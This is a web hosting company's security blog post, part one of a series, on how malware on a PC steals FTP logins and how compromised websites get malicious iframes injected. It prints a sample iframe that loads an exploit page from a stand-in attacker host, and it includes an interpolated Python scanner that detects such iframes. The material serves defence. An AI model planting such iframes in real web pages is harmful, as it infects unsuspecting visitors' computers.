The Anatomy of a malware-zombie network and how it affects your website & everyone! (Part I)

Remember the “This site may harm your computer” warning message that you
came across on Google when you were searching for something which looked
like this…

…or the warning shown by Firefox/Chrome which looked like this:

…or your anti-virus software alerting you that a threat has been detected
when accessing a certain website?

If it happens to be your website, then your website is the victim of a
malware attack in which malicious code is injected into your web pages.
According to a 2009 Websense report (link),
77% of Web sites with malicious code are legitimate websites that have been
compromised. It also recorded a “671% growth in the number of malicious
websites detected in 2008 – 2009”.

Who makes malware and why do they?

Malware is created by hackers or groups of hackers who do it intentionally
for their own interests. These viruses and malware can be designed to use a
PC's resources illegally, without the knowledge of the user, to steal data
including bank account details, credit card numbers, passwords, etc.; launch
distributed network attacks (like DDoS) on other servers; obtrusively
advertise products or services in the form of pop-up ads; send spam; and so
on. Your PC becomes a “zombie”, spreads the infection to other PCs and
becomes part of the cycle called a “zombie network”. This allows the master
of the “zombie network” to access the resources of all infected computers
and use them for their own benefit. There are even “Software as a Service”
(SaaS) type websites that offer automated solutions for anyone who wants to
inject several websites with iframe codes, as reported in this news article
(link), which is indeed shocking.

How will my website be affected when my PC is infected?

95% of the malware attacks occur via FTP, where malicious code (usually an
iframe) is injected into the website files. The hackers/attackers may even
upload malicious files for other evil activities. So once the virus on your
PC has stolen your FTP login details, anything can happen, with disastrous
results.

The virus on your PC can retrieve your FTP login details without your
knowledge, and that is normally done using one of a couple of methods:

1) When you save your FTP login in your FTP client software (e.g. Filezilla,
CuteFTP, etc.), the virus on your PC can decrypt the logins stored in the
FTP client software's data file and send the login details to a master
(evil) server, from which they are distributed to others (hackers) who
upload malicious code on request.

2) The virus on your PC could be key-logging or sniffing your FTP (or even
control panel) traffic and would send that information to the master
server, all without your knowledge.

What does the malicious code contain?

The malware is designed to perform specific functions when an unsuspecting
visitor to your legitimate website accesses it in their browser. The most
popular malicious codes are iframe codes, so that the code executes along
with your web page in the background. The iframe code would typically load
a link to a malicious file hosted on another remote server, which is
downloaded through the unsuspecting visitor's browser to their PC, and the
cycle continues as that PC has now become part of the zombie network.

Typical iframe code: <iframe src=evilserver.tld/getexploits.php border=0>

In the above example, when getexploits.php is requested by the browser, it
may exploit vulnerabilities in the browser.
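Since injected iframes like the one above are what a compromised site owner has to find, here is a small scanner written for this post (example code, not from the original article or from Future Hosting) that flags iframes in a page pointing to an off-site host or sized/hidden so the visitor never sees them. The trusted host list, the sample page and the names of the functions are assumptions for the example.

```python
import re
from html.parser import HTMLParser

# Hosts the site may legitimately frame content from (assumed for this example).
TRUSTED_HOSTS = {"example-site.tld", "www.example-site.tld"}

class IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []  # attribute dict of every <iframe> start tag seen
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})

def _external_host(src):
    """True when src points off-site; a schemeless 'host/path' like the post's sample counts."""
    m = re.match(r"^(?:[a-z][a-z0-9+.\-]*:)?//([^/?#]+)", src, re.I)
    if m:
        host = m.group(1)
    else:
        first = src.split("/", 1)[0]
        if "/" not in src or "." not in first:
            return False  # plain relative path such as about.html or /img/x
        host = first
    return host.rsplit("@", 1)[-1].split(":")[0].lower() not in TRUSTED_HOSTS

def _hidden(attrs):
    """Injected frames are usually zero-sized or hidden so the visitor sees nothing."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return (attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
            or "display:none" in style or "visibility:hidden" in style)

def suspicious_iframes(html):
    """Return [(src, reasons)] for each iframe in html that looks injected."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        reasons = (["external host"] * _external_host(src)
                   + ["hidden or zero-sized"] * _hidden(attrs))
        if reasons:
            findings.append((src, reasons))
    return findings

# Constructed sample page: the post's iframe, a legitimate on-site frame, and an
# on-site frame hidden the way an injected one usually is.
INFECTED_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="https://www.example-site.tld/video" width="400" height="300"></iframe>
<iframe src=evilserver.tld/getexploits.php border=0>
<iframe src="/promo.html" width=0 height=0></iframe>
</body></html>"""
```

Run `suspicious_iframes` over every .html/.php file under the web root and compare the findings against a known-clean copy of the site; any hit that is not in the clean copy is a file the FTP account has been used to modify.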

What else can happen to the website when my FTP login is compromised?

Since the hackers are now able to upload files to your account through FTP,
besides injecting malicious code into files they may upload spamming
scripts to send spam emails from your server, upload DoS scripts to launch
distributed attacks on other servers, run IRC bots that can result in
extremely high bandwidth usage, etc. As a result of the malicious activity
your website will start losing traffic, as search engines and browsers will
block it, its search engine ranking will drop and it will get blacklisted
as well. It doesn't matter how big or small your website is or how severe
the hack is: this is the sort of relationship where malware (hackers)
always win and legitimate websites always lose.

How can I safeguard my PC to prevent FTP login theft?

This will be discussed extensively in the next part of this security special
blog series, so please stay tuned!

-
Arun
System Administrator
Future Hosting, LLC